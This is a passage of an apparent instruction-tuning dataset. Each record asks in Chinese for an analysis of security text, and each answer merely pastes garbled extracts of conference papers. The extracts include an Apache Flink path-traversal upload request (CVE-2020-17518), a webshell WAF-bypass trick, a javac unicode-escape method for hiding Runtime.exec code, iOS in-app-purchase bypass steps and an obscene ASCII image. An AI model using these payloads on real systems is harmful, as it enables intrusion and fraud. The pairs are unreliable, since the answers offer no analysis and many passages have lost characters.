Radio (LTR) This is what The Riviera Runs LTR - Overview  Decentralized Model  Uses sub-audible data on each frequency to control system  Each frequency is assigned an LCN  Logical Channel Number  Users are assigned to a specific LCN and only move if it is busy  Frequencies must be entered in LCN order to scan properly Motorola SmartNet & SmartZone SmartNet (Site) ((( ))) ((( ))) SmartNet (Simulcast) ((( ))) ((( ))) ((( ))) ((( ))) Site 1 Site 2 SmartZone ((( ))) ((( ))) ((( ))) ((( ))) ((( ))) Site 1 Site 2 Site 3 ? SmartZone OmniLink Zone 1 Zone 2 ((( ))) ((( ))) ((( ))) ((( ))) (((", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nthe pentest is dead, long live the pentest! Taylor Banks & Carric 1 carric 2 taylor 3 44 Overview 1 the pentest is dead 1.1 history of the pentest 1.2 pentesting goes mainstream 2 long live the pentest 2.1 the value of the pentest 2.2 evolution of the pentest 2.3 a framework for repeatable testing 2.4 pentesting in the 21st century and beyond conclusions 4 55 Taylors [Dont Give Me Bad Reviews Because I Made Fun of You] Disclaimer: Im about to really rip on some folks, so I figure I might as well offer an explanation, (and some semblance of an apology) in advance. Contrary to implications in later slides, there ARE actually a handful of really smart people doing pentests, writing books about pentests and teaching classes on pentesting, who despite their certifications (or lack thereof) actually know WTF they are doing. Those are not the people Im talking about. This presentation picks on the other douchebags who call themselves pentesters. As such, I plan to talk about what you (and I) can do to take the industry back from the shameless charlatans whove almost been successful in giving the rest of us a bad name. Yours very sincerely, -Taylor 5 Part 1 the pentest is dead 6 7 the pentest is dead history of the pentest pentesting goes mainstream 7 7 1.1 history of the pentest 8 9 the timeline 1970 - 1979 1980 - 1989 1990 - 1999 2000 - 2008 9 Captain Crunch, Vin Cerf, Blue Boxes, Catch-22 CCC, 414s, WarGames, LoD, MoD, CoDC, 2600, Phrack, Morris worm, Mitnick v MIT/DEC, Poulsen, CERT Sundevil, EFF, LOD vs MOD, Poulsen, Sneakers, DEF CON, AOHell, Mitnick, The Net, Hackers, MP3, RIAA, Back Orifice, L0pht, Melissa ILOVEYOU, Dmitry Sklyarov, DMCA, Code Red, Paris Hiltons Sidekick, XSS, Storm Worm, Web2.x, AJAX 9 10 on semantics were talking about classic [network-based] penetration testing were not talking about 0-day vulndev, on-the-fly reversing, etc (if thats what you were looking for, you can skip out to the bar now) 10 10 11 a brief history: the pentest 11 early pentesting ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n大可(Dark) iOS軟體逆向工程應用 & 手機遠程監控技術 經歷  PHATE Security- 創辦人  Zuso Security - 成員  Chroot - 成員  吉瑞科技 - R&D  網駭科技 - R&D  某警調單位 - 外聘顧問  資策會 - 教育訓練講師  中科院 - 教育訓練講師 內容簡介  iOS 軟體逆向工程應用  IAP (In-App-Purchases) 破解技術  遊戲作弊引擎設計  iOS遠程控制軟體設計 謹以此紀念Steve Jobs iOS 軟體逆向工程技巧 iOS APP簡介  執行檔格式  Mach-O  組合語言格式  ARMv6  Thumb  ARMv7  Thumbv2 工具  已JB的iphone  GDB  動態分析  IDA Pro  靜態分析  otool  觀察mach-o執行檔結構  class-dump  將執行檔中的objective C classes輸出成.h 拿IDA Pro開刀前  將加密的code還原  otool l filepath | grep crypt (確定加密的位置&大小)  使用gdb將程式執行後~把該區域dump出來  重新塞入執行檔 DEMO Binary Patching  找出要修改的位置  利用ARM Assembler組譯  找出對應OP Code  修改 , 並重新簽章 DEMO 繞過IAP (In-App-Purchases)檢查 兩種繞過IAP介面的通用方式  從執行檔下手-分析IAP  API  -需JB  架設假IAP認證伺服器 (MITM SSL Proxy Server)  -不需JB IAP流程  從API角度看 建立SKPaymentTransaction class 根據購買狀態將SKPaymentTransaction transactionState區分為 SKPaymentTransactionStatePurchasing SKPaymentTransactionStatePurchased SKPaymentTransactionStateFailed SKPaymentTransactionStateRestored 購買狀態若有變化 , 則會呼叫 (void)paymentQueue:(SKPaymentQueue *)queue updatedTransactions:(NSArray *)transactions Developer可根據transactions的類型來決定內購各種狀態變化所要呈現的東西 Sample:  - (void)paymentQueue:(SKPaymentQueue *)queue updatedTransactions:(NSArray *)transactions  {  for (SKPaymentTransaction *transaction in transactions)  {  switch (transaction.transactionState)  {  case SKPaymentTransactionStatePurchased:  if([self putStringToItunes:transaction.transactionReceipt]){  //許多developer會認為程式運作到這 , 就已經購買成功 , 而沒再做訂單驗證  }  break;  }  }  } Apple IAP收據驗證伺服器  https://buy.itunes.apple.com/verifyReceipt  將訂單轉json傳入伺服器即可驗證  驗證完會收到訂單資訊 , status 0代表付款已完成  如下 {\"receipt\":{\"original_purchase_date_pst\":\"2012-07-12 05:54:35 America/Los_Angeles\", \"purchase_date_ms\":\"1342097675882\", \"original_transaction_id\":\"170000029449420\", \"original_purchase_date_ms\":\"1342097675882\", \"app_item_id\":\"450542233\", \"transaction_id\":\"170000029449420\", \"quantity\":\"1\", \"bvrs\":\"1.4\", \"version_external_identifier\":\"9051236\", \"bid\":\"com.zeptolab.ctrexperiments\", \"product_id\":\"com.zeptolab.ctrbonus.su", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nWindows 本地提权在野 0day 狩猎之旅 Quan Jin <twitter: @jq0904> DBAPPSecurity Black Hat USA 2022 注本文是作者在今年 Black Hat USA 2022 演讲议题的中文版 摘要 本文将讲述我们如何在 2020-2021 两年间狩猎 Windows 本地提权在野 0day 的故事为什 么我们觉得这件事可行我们如何研究历史案例我们如何用学到的经验开发一套检测系统 以及我们如何改进这套系统使之变得更准确通过使用这套系统我们成功捕获了两个 Windows 本地提权在野 0day 和一个 Windows 本地提权在野 1day 此外我们也将比较几种不同狩猎方法的优点和缺点并给出一些对未来 Windows 本地提 权在野 0day 的趋势预测 背景 从下图可以看出从 2017 年到 2021 年微软一共披露了 28 个在野的 Windows 本地提权 0day它们中的大部分是 Windows 内核漏洞这些漏洞通常被顶级 APT 组织使用并且会 造成巨大危害对安全厂商来说捕获一个这样的在野 0day 是一件非常有挑战性的事情 Windows 本地提权在野 0day (2017-2021) 是否有可能捕获一个 Windows 本地提权在野 0day 为了回答这个问题我们需要思考另外两个问题 1. 如何获取有价值的数据源可能含有在野 0day 的数据源 2. 如何开发一套有效的检测方法 对于第一个问题我们有一些自己的数据集此外历史案例表明像 VirusTotal 这类的公共 平台有可能出现 0day因此通过使用私有和公有数据集我们可以解决第一个问题 对于第二个问题有两种方法可以从海量样本中捕获一个 0day动态检测和静态检测 a) 动态检测是指的是在真实环境中进行检测或在沙箱中进行模拟执行并通过异常行为 过滤出 0day 样本典型代表是杀毒软件和沙箱 b) 静态检测是指使用静态特征匹配出样本典型代表是 YARA 两种方法都有其优点和缺点我们对两种方法都进行了一些思考和尝试测试结果表明静 态检测方法更适合我们我们将在后文详细描述这个过程 接下来我将解释为什么我们花了大量时间研究历史上的 Windows 本地提权在野 0day 从历史和当下中学习 为什么我们应当从历史中学习 有三个原因 1. 一些漏洞利用手法在一段时间内具有连续性 2. 从攻击者视角进行思考可以帮助我们更好地防御 3. 历史案例已经被整个安全社区仔细研究过我们可以站在巨人的肩膀上 我们如何学习历史案例 为了从历史中学习我们研究了超过 50 个 CVE 漏洞涵盖了从 2014 年到 2021 年期间几乎 所有的 Windows 本地提权在野 0day 和部分 1day 我们仔细统计了这些漏洞的发现厂商使用组织修补周期初始披露文章使用场景被 攻击的系统版本漏洞模块漏洞类型利用手法公开的分析博客公开的利用代码原 始样本如果有和其他信息 这里我想重点说明其中的几个关键点 使用场景 a) 样本是作为独立提权组件使用的还是作为一个利用链的一部分 b) 利用代码是基于无文件形式使用的例如 dll reflection还是包含在一个落地文件中 这些信息会直接影响我们对不同检测方案的选取 被攻击的系统版本 许多 Windows 本地提权样本在使用前会检测操作系统版本并且只能在一些特定的版本中 利用或触发 这个信息在制作沙箱环境或漏洞复现环境时尤其有用 漏洞模块 通过统计历史样本的漏洞模块我们可以得知哪个组件最多次被攻击哪个攻击面在一段特 定时间内最受攻击者青睐 这些信息可以帮助我们预测接下来最可能出现的漏洞 漏洞类型 通过统计历史样本的漏洞类型我们可以推断攻击者最喜欢使用的漏洞类型这个信息可以 帮助我们制作正确的复现环境例如是否需要配置 Driver Verifier这个信息也可以告诉 我们不同漏洞类型的流行程度例如竞争条件漏洞在最近几年逐渐增多 利用手法 我认为这是最重要的信息我们统计了大多数 Windows 本地提权在野 0day 的漏洞利用手 法基于这部分统计我们得出了一些有价值的结论例如bServerSideWindowProc手 法在 2015 年到 2016 年很流行使用Previous Mode手法去实现任意地址读写的手法从 2018 开始变得越来越流行使用HMValidateHandle来泄露内核信息的手法在过去 5 年 很流行 公开的分析博客和利用代码 公开的分析博客和利用代码包含整个社区的研究成果吸收这些已存在的知识就像站在 巨人的肩膀上对我们帮助很大 原始样本如果有 我们仔细收集了历史 Windows 本地提权在野 0day 的原始样本如果有这些原始样 本的文件哈希和利用手法都是第一手资料如果我们能检测", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBreaking Google Home: Exploit It with SQLite(Magellan) Wenxiang Qian, Yuxiang Li, Huiyu Wu Tencent Blade Team About Us Wenxiang Qian (@leonwxqian) Senior security researcher at Tencent Blade Team. Focus on browser security & IoT security Interested in code auditing. Security book author. Speaker of DEF CON 26, CSS 2019 YuXiang Li (@Xbalien29) Senior security researcher at Tencent Blade Team. Focus on mobile security and IoT security Reported multiple vulnerabilities of Android. Speaker of HITB AMS 2018, XCON 2018, CSS 2019 HuiYu Wu (@NickyWu_) Senior security researcher at Tencent Blade Team Bug hunter, Winner of GeekPwn 2015. Speaker of DEF CON 26 , HITB 2018 AMS and POC 2017 About Tencent Blade Team  Founded by Tencent Security Platform Department in 2017  Focus on security research in the areas of AIoT, Mobile devices, Cloud virtualization, Blockchain, etc  Reported 200+ vulnerabilities to vendors such as Google, Apple, Microsoft, Amazon  We talked about how to break Amazon Echo at DEF CON 26  Blog: https://blade.tencent.com Agenda  The Security Overview of Google Home  Fuzzing and Manual Auditing SQLite & Curl  Remote Exploiting Google Home with Magellan  Conclusion The Security Overview of Google Home Aug 2018 DEFCON26 Breaking Smart Speaker : We are Listening to You Amazon Echo - Remote Code Execution XiaoMi AI Speaker  Remote full Control (root) https://voicebot.ai/2019/02/20/amazon-increases-global-smart-speaker-sales-share-in- q4-2018-while-googles-rise-narrows-the-gap-and-apple-declines/ Global Smart Speaker Sales Share in Q4 2018 About Google Home Hardware Overview  Google Home family uses similar hardware (except Google Home Hub)  Did not find the hardware interface for debugging and flashing  We started to extract firmware directly from NAND Flash chip Google Home Mini Teardown Dump Firmware From NAND Flash Dump Firmware From NAND Flash BGA67 ADAPTER PCB Dump Firmware From NAND Flash RT809H Universal Programmer Data Extraction From Raw NAND Flash Image ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nimport struct def chunks(l, n): for i in range(0, len(l), n): yield l[i:i + n] def xor_qword(chunk, qword): dword = struct.pack(\"<I\", qword >> 32) out = '' for a, b in zip(map(ord, chunk), map(ord, dword)): out += chr(ab) return out init_data = 0xD806209B3D160872 round_data = 0x5851F42D4C957F2D data = '49AB407E86FAA237'.decode('hex') decoded_chunks = [] for chunk in list(chunks(data, 4))[::-1]: init_data = (init_data * round_data + 1) & 0xffffffffffffffff d = xor_qword(chunk, init_data) decoded_chunks.append(d) decoded_text = ''.join(decoded_chunks[::-1]) print(repr(decoded_text))", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Apache Flink Upload Path Traversal (CVE-2020-17518) Apache Flink is an open source stream processing framework with powerful stream- and batch-processing capabilities. Apache Flink 1.5.1 introduced a REST handler that allows you to write an uploaded file to an arbitrary location on the local file system, through a maliciously modified HTTP HEADER. References: - https://github.com/apache/flink/commit/a5264a6f41524afe8ceadf1d8ddc8c80f323ebc4 - https://nvd.nist.gov/vuln/detail/CVE-2020-17518 ## Environment Setup Execute following commands to start a Apache Flink jobmanager 1.11.2: ``` docker compose up -d ``` After the Apache Flink is started, visit `http://your-ip:8081` to view the homepage. ## Exploit Use following request to upload a file to `/tmp/success`: ``` POST /jars/upload HTTP/1.1 Host: localhost:8081 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Connection: close Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryoZ8meKnrrso89R6Y Content-Length: 187 ------WebKitFormBoundaryoZ8meKnrrso89R6Y Content-Disposition: form-data; name=\"jarfile\"; filename=\"../../../../../../tmp/success\" success ------WebKitFormBoundaryoZ8meKnrrso89R6Y-- ``` ![](1.png)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nCVE-2022-33891: Apache Spark shell command injection vulnerability via Spark UI 影响版本 Apache Spark versions 3.0.3 and earlier, versions 3.1.1 to 3.1.2, and versions 3.2.0 to 3.2.1. 分析 先看到官描述 https://lists.apache.org/thread/p847l3kopoo5bjtmxrcwk21xp6tjxqlc 当中可以根据提找到diff https://github.com/apache/spark/pull/36315/files 这没做害处理直接对命令进拼接造成命令注 如图那么漏洞原理确实很简单那么接下来就要看如何触发了 先关于配置可以参考https://spark.apache.org/docs/3.0.3/security.html 个漏洞能利的最简配置当然不定是和acl相关的最佳配置毕竟还有其他参数当然 作为漏洞研究就这样开启就好其中[]为可选项意思是不加都 分析可以得到调链 org.apache.spark.ui.HttpSecurityFilter.doFilter() org.apache.spark.SecurityManager.checkUIViewPermissions() org.apache.spark.SecurityManager.isUserInACL() org.apache.spark.util.Utils.getCurrentUserGroups() org.apache.spark.security.ShellBasedGroupsMappingProvider.getGroups() org.apache.spark.security.ShellBasedGroupsMappingProvider.getUnixGroups() ./bin/spark-shell --conf spark.acls.enable=true --conf spark.ui.port=8099 --conf spark.ui.view.acls=true [--conf spark.user.groups.mapping=org.apache.spark.security.ShellBasedGroupsMappin gProvider] 这个HttpSecurityFilter很明显是个filter其实猜都能猜到既然是和权限校验相关那么肯定 是所有路由都会经过这个filter的当然也能找到这样的代码段来验证 接着回来我们可以看到它参数来源于doAs 那就很简单了 val securityFilter = new HttpSecurityFilter(conf, securityMgr) val holder = new FilterHolder(securityFilter) handler.addFilter(holder, \"/*\", EnumSet.allOf(classOf[DispatcherType]))", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDDoS  Yesterday, Today and tomorrow Frank Tse, William Guo Nexusguard Page  2 Agenda DDoS Introduction DDoS Attack Analysis DDoS Detection and Mitigation Fighting DDoS in Mobile Era 1 2 3 4 FAQ 5 Page  3 About us Nexusguard, incorporated in 2008, is a premium provider of end-to-end, in-the-cloud Internet Security Solutions. Nexusguard delivers solutions over the internet to ensure that our clients enjoy uninterrupted web- service delivery to their users, by protecting them against the ever- increasing and evolving multitude of internet threats, particularly Denial- of-Service (DDoS) attacks, and other attacks directed at web application software. Page  4 What is DDoS  A distributed denial-of-service (DDoS) attack is one in which a multitude of compromised systems attack a single target, thereby causing denial of service for users of the targeted system.  The flood of incoming messages to the target system essentially forces it to shut down, thereby denying service to the system to legitimate users. What is DDoS Page  5 5 Zombies on innocent computers Server-level DDoS attacks (Protocol / Application) Infrastructure-level DDoS attacks Bandwidth-level DDoS attacks Page  6 What is DDoS Credit http://www.wired.com/politics/security/magazine/15-09/ff_estonia_bots Page  7 DDoS in the news Motivation of Cyber Attack Page  8 Page  9 DDoS vs. Hacking DDoS Hacking If (Availble){ try { SQLi, XSS, CSRF MITM, Brute Force, Reverse Engineering, Buffer Overflow, RFI, Session Hijacking, Information Leakage, Defacement, something cool } catch (data) finally { DDoS } while (Available){ try { DDoS()} finally { Give_up()} Page  10 Trend of DDoS attack POC Organized Collaborated Volume Focus 0-day focus 2008 2009 DJB33X 100+Gbps / 70Mpps Page  11 DDoS Attack  Brief History Packet Generator Packet Crafter Creative Attacks Page  12 DDoS - Yesterday 2002 root DNS attack All thirteen (13) DNS root name servers were targeted simultaneously. Attack volume was approximately 50 to 100 Mbits/sec ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSamsung Pay Tokenized Numbers, Flaws and Issues About Me Salvador Mendoza (Twitter: @Netxing)  Researcher o Android apps and tokenization mechanisms.  College student o A. S. Computer Science o Computer Network Administration Certificate o Computer Programming Specialist Certificate Agenda  Terminology  Tokenized numbers  Numbers and analyzing a token  MST and NFC protocols  Fragile tokenized process and storage  Possible attacks  JamPay tool Terminology  NFC: Near Field Communication  MST: Magnetic Secure Transmission  VST: Visa Token Service  Tokenized numbers: A process where the primary account number (PAN) is replaced with a surrogate value = Token.  Token: An authorized voucher to interchange for goods or service.  TSP: Token Service Provider  PAN: Primary Account Number Analyzing Tokenized Numbers (Token) %401230000123456721041010647020079616?;401230000123456721041010647020079616? ~401230000123456721041010647020079616? % = Start sentinel for first track  = Separator ? = End sentinel for every track ; = Start sentinel for second track ~ = Start sentinel for third track A tokenized number follows exactly the same format of IATA/ABA; emulating perfectly a swiping physical card. Analyzing a Track Second track ;401230000123456721041010647020079616? 401230-000-1234567 401230 000 01234567 New CC number Private BIN # Never change, from original CC Still researching The first 16 digits are the new assigned CC number: 4012300001234567 Analyzing a Track Second track = ;401230000123456721041010647020079616? 2104-101-0647020079616 21/04 101 064702-0079-616 Token New expiration date. Service code: 1: Available for international interchange. 0: Transactions are authorized following the normal rules. 1: No restrictions. 064702: It handles transactions range/CVV role. 0079: Transactions id, increase +1 in each transaction. 616: Random numbers, to fill IATA/ABA format, generated from a cryptogram/array method. The last 20 digits are the tokens heart: 21041010647020079616 NFC/M", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n.\\\" auto-generated by docbook2man-spec $Revision: 1.1 $ .TH \"DROP CONVERSION\" \"7\" \"2003-11-02\" \"SQL - Language Statements\" \"SQL Commands\" .SH NAME DROP CONVERSION \\- 删除一个用户定义的编码转换 .SH SYNOPSIS .sp .nf DROP CONVERSION \\fIname\\fR [ CASCADE | RESTRICT ] .sp .fi .SH \"DESCRIPTION 描述\" .PP \\fBDROP CONVERSION\\fR 删除一个以前定义的编码转换 要想删除一个转换你必须拥有该转换 .SH \"PARAMETERS 参数\" .TP \\fB\\fIname\\fB\\fR 编码转换的名字这个名字可以用模式修饰 .TP \\fBCASCADE\\fR .TP \\fBRESTRICT\\fR 这些键字没有作用因为编码转换上没有依赖关系 .SH \"EXAMPLES 例子\" .PP 删除一个叫做 myname 的编码转换 .sp .nf DROP CONVERSION myname; .sp .fi .SH \"COMPATIBILITY 兼容性\" .PP SQL 标准里没有 DROP CONVERSION .SH \"SEE ALSO 参见\" ALTER CONVERSION [\\fBalter_conversion\\fR(7)], CREATE CONVERSION [\\fBcreate_conversion\\fR(l)] .SH \"译者\" .B Postgresql 中文网站 .B 何伟平 <laser@pgsqldb.org>", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 Webshell 访问拦截绕过时候怎么办 安全狗不单单只拦截上传内容还会检测拦截访问内容若匹配中了访问规则就会被拦截绕 过很简单只需要在访问的件名后加 / 就能绕过拦截 正常请求 绕过请求 C 复制代码 http://192.168.142.140/coon.php 1 C 复制代码 http://192.168.142.140/coon.php/ 1 2 该技巧仅在 WIndows 下 PHP 7.1.32 安全狗的环境下测试成功其他环境师傅请测", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAdventures in buttplug penetration (testing) @smealum Intro to teledildidonics Word of the day teledildonics /ˈtelədildōäniks/ From the Greek têle, meaning afar, and the English dildo, meaning dildo. Use scenario 1: solo play Use scenario 2: local co-op Use scenario 3: remote co-op Internet Use scenario 3b: remote paid co-op Internet Compromise scenario 1: local hijack Internet Compromise scenario 2: remote hijack Internet Compromise scenario 3: reverse remote hijack The Lovense Hush The Lovense Hush  The Worlds First Teledildonic Butt Plug  Its a buttplug  You can control it from your phone  iOS or Android  You can control it from your computer  Windows or Mac OS  App includes social features  Chat (text, pictures, video)  Share toy control with friends or strangers The Lovense ecosystem Lovense Remote App Toys USB dongle BLE Internet USB Lovense compromise map Compromise scenario #1 Compromise scenario #2 Compromise scenario #3 BLE Internet USB Where to start? ? ? No code/binaries available No code/binaries available Binaries available for download Binaries available for download Lovense remote Requires a lovense account Long distance play mode Local play control mode Runs on both Windows and Mac OS, so of course its electron-based => We just need to read some slightly obfuscated JavaScript Lovense remote: the dongle protocol ... var t = new l.SerialPort(i.comName, { baudRate: e.dongleBaudRate.baudRate, dataBits: 8, parity: \"none\", stopBits: 1, flowControl: !1 }); ... Lovense Remote: app.js  The app is all written in JavaScript  The code is somewhat obfuscated, but field names are still present  Throw it in a beautifier and you can get a good idea of whats going on with little effort  For example: search for dongle, and find the following => app and dongle talk over serial  We can easily sniff serial traffic  Two types of commands  Simple: DeviceType;  Complex: encoded as JSON  Same with dongle responses  After DeviceType, theyre all JSON  Responses are read 32 by", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n2008 年駭客年會徵求論文 HIT 2008 Call For Paper u 時間2008 年 7 月 19 日~20 日星期六星期日 u 主辦單位CHROOT  Security Research Group (http://www.chroot.org) u 活動網址http://hitcon.org 台灣第四屆駭客年會將於 2008 年 7 月 19~20 日週六日舉行歡迎各界人士踴躍 投稿論文內容以探討實作技術並能演講 50 分鐘為佳 為了讓會議主題能夠明確我們擬定了以下議題有興趣的朋友可以從下列議題中選 擇自己擅長的方面進行準備(包括論文程式碼和投影片)但不以下列的議題為限今年 特別歡迎各項有關 Windows Vista 作業系統的安全技術探討 1. Exploit technique 對於網路作業系統和應用程式等各方面攻擊程式或手法的技術研究 2. Honeypot 構建安全的 Honeynet 系統對各種入侵進行詳細的技術分析瞭解攻擊者行為和 攻擊手法等或者對於 Honeypot 進行反追蹤技術的探討 3. Virus and anti-virus 電腦病毒和防毒軟體新趨勢或研究 4. Reverse engineering 對二進位檔或者不明資料進行詳細解析構建反向工程的具體過程和方法 5. Audit software vulnerability 對開放原始碼的軟體進行安全性檢測與分析的具體過程和方法或是對商業軟體所 進行的安全性分析 6. Backdoor and rootkit 各種新型態的後門或木馬的設計研究或是檢查方式 7. Web and database security 各種網頁網站軟體和資料庫的安全性探討 8. Firewall, WAF, IDS and IDP 防火牆(Firewall)入侵偵測(防禦)系統(IDSIDP)等的技術現狀和發展前景入侵 檢測系統在現階段的實際應用情況等此外歡迎近年來對於加強 Web 應用程式 安全的 WAF (Web Application Firewall)的各項技術研究 9. Hardened system 對各種當前各種作業系統進行安全加強提升不同安全級別方法技術發展方向 等 10. Covert Channel 隱藏傳輸通道將某特定的資料隱藏包裝於其它正常的資料串流或協定中進行傳 送 論文可選中文或英文撰寫 每文第一頁必須包含題目作者聯絡人演講者及聯 絡資料(電話電子郵件)等並以 PDF 檔格式於 2008 年 6 月 15 日前利用電子 郵件附帶傳送檔案至 hit2008@hitcon.org 為鼓勵投稿本次會議將致贈每篇被接受之論文 NT $3,000 元整 此外大會將依 作者意願將論文或演講內容以電子或書面媒體方式散佈 除了上述的論文徵求外本次駭客年會計畫了一場 0-day exploit 展示只要在 2 008 年 6 月 15 日前將您個人所發現的漏洞(未公開且尚未被修正)以電子郵件方式 傳送至 hit2008@hitcon.org經過確認就有機會免費取得本屆駭客年會的入場券並 且上台展示漏洞", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDont Fuck It Up! Zoz jackdawsart.com Unjust laws exist: shall we be content to obey them, or shall we endeavor to amend them, and obey them until we have succeeded, or shall we transgress them at once? Henry David Thoreau, Civil Disobedience FUCK IT UP * y o u * h a v e * b e e n * B S O D o m i z e d * y y o / \\ \\ / \\ o u | | \\ | | u * | `. | | : * h ` | | \\| | h a \\ | / / \\\\\\ --__ \\\\ : a v \\ \\/ _--~~ ~--__| \\ | v e \\ \\_-~ ~-_\\ | e * \\_ \\ _.--------.______\\| | * b \\ \\______// _ ___ _ (_(__> \\ | b e \\ . C ___) ______ (_(____> | / e e /\\ | C ____)/ \\ (_____> |_/ e n / /\\| C_____) | (___> / \\ n * | ( _C_____)\\______/ // _/ / \\ * B | \\ |__ \\\\_________// (__/ | B S | \\ \\____) `---- --' | S O | \\_ ___\\ /_ _/ | O D | / | | \\ | D o | | / \\ \\ | o m | / / | | \\ | m i | / / \\__/\\___/ | | i z | / | | | | z e | | | | | | e d | | | | | | d * y o u * h a v e * b e e n * B S O D o m i z e d * On the Internet, everyone knows you like ASCII Goatse.  Tradecraft Perceptual Biases Expectations Resistance Ambiguities Biases In Evaluating Evidence Consistency Missing Information Discredited Evidence Biases In Estimating Probabilities Availability Anchoring Overconfidence Biases In Perceiving Causality Rationality Attribution Tradecraft  Key Assumptions Check  Quality Of Information Check  Contrarian Techniques  Devils Advocacy  High Impact/Low Probability  What If? Analysis  Red Team OPSEC Identify Critical Info Analyze Threats Assess the Risks Apply Countermeasures Analyze Vulnerabilities The 7 Deadly Fuckups  Overconfidence  Trust  Perceived Insignificance  Guilt By Association  Packet Origin  Cleartext  Documentation Dont Fuck It Up When You Use A VPN  Traffic Encryption  Location Obfuscation  Request Concealment  ...Depending On Listener Location  ...Depending On Provider  Remember: PPTP Broken As Of Dont Fuck It Up When You Use Case Study: LulzSec/AntiSec IRC WITHOUT TOR... ...NOT EVEN ONCE  Dont Fail Unsafe With Tor  Always Check What Youre Exposing  OPSEC Is 24/7 Moral: Case Study: Ha", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 从javac源码看Unicode编码绕过的原因 前 搭建Javac调试环境 持变形Unicode的原因 注释+换绕过的原因 个奇怪的发现 @yzddMr6 家都知道jsp中可以\\uxxxx或者\\uuuuuuxxxx这种格式来对恶意代码进混淆并且还可以注 释+换unicode的式进恶意代码的逃逸那么是什么造成了这种情况呢带着问题我们从Javac层 看看原因是什么 使源码来调试的原因主要是源码有变量名以及注释等便理解 git clone https://github.com/arthur-zhang/javac-source-code-reading 这个项打开后法直接使有些源码并不完整 解决办法是动把tools.jar加为库件 前 搭建Javac调试环境 2 在源码中进番查找我们可以找到解析unicode编码的地在 com.sun.tools.javac.parser.UnicodeReader#convertUnicode 这ch是当前扫描的字符bp是当前扫描到的位置unicodeConversionBp是来记录上个unicode 的位置 关检步骤的作已经在代码中给出 持变形Unicode的原因 3 因此我们的第个问题就解决了能持\\uuuuu这种的原因是javac使了while循环来扫描循环的判 断逻辑是只要\\的后直是u就会直往下读取 Plain Text 复制代码 protected void convertUnicode() { if (ch == '\\\\' && unicodeConversionBp != bp) {//当前字符是'\\'且不是 上个unicode的位置 bp++; ch = buf[bp];//读取下个字符 if (ch == 'u') { do { bp++; ch = buf[bp];//继续读下个字符 } while (ch == 'u');//只要'\\'的下个字符是u就会直到 while循环 int limit = bp + 3;//记录unicode的最后个位置 if (limit < buflen) { int d = digit(bp, 16); int code = d; while (bp < limit && d >= 0) {//这的主要功能是读取 \\u00xx中xx的内容并且转为对应的char字符 bp++; ch = buf[bp]; d = digit(bp, 16); code = (code << 4) + d; } if (d >= 0) { ch = (char)code;//转为对应的char字符 unicodeConversionBp = bp; return; } } log.error(bp, \"illegal.unicode.esc\"); } else { bp--; ch = '\\\\'; } } } 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 4 还有种利姿势是 //+\\u000d换的写法进代码的逃逸如下这个例 表上java.lang.Runtime.getRuntime().exec(\"whoami\");是在注释符的后法执但实际上由于前 存在\\u000d转义字符导致后的代码逃逸了出来实际编译的时候是下的代码形式 注释+换绕过的原因 Plain Text 复制代码 public class test { public static void main(String[] args) throws Exception { //\\u000djava.lang.Runtime.getRuntime().exec(\"whoami\"); } } 1 2 3 4 5 5 javac后的class件也可以印证我们的说法 于为什么这样可以绕过呢javac对于注释的核处理代码在这 com.sun.tools.javac.parser.JavaTokenizer#readToken 可以看到这也进了个do while的循环只要当前的ch!=CR或者LF或者没有读取到最度都会继 续读取最后把pos跟bp之间的字符都当作注释这的pos是进token读取之前记录的个起始值 其中我们代码中到的\\u000d也就是CR关于token读取过程中些特殊的字符解释如下 Plain Text 复制代码 public class test { public static void main(String[] args) throws Exception { // java.lang.Runtime.getRuntime().exec(\"whoami\"); } } 1 2 3 4 5 6", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nGreater Than One Defeating strong authentication in web applications - Brendan OConnor Introduction Background Information Control Types Device Fingerprinting One Time Passwords Knowledge Base Archives Conclusions Introduction Internet Banking Bill Pay Car Loans and Mortgages Retirement Plans / 401K Stock Trading / Investments Background Federal Financial Institution Examination Council Authentication in an Internet Banking Environment The agencies consider single-factor authentication, as the only control mechanism, to be inadequate for high-risk transactions involving access to customer information or the movement of funds to other parties . . . Account fraud and identity theft are frequently the result of single-factor (e.g., ID/password) authentication exploitation. source: http://www.ffiec.gov/ffiecinfobase/resources/info_sec/2006/frb-sr-05-19.pdf Background Access to customer information or movement of funds  read: pretty much every 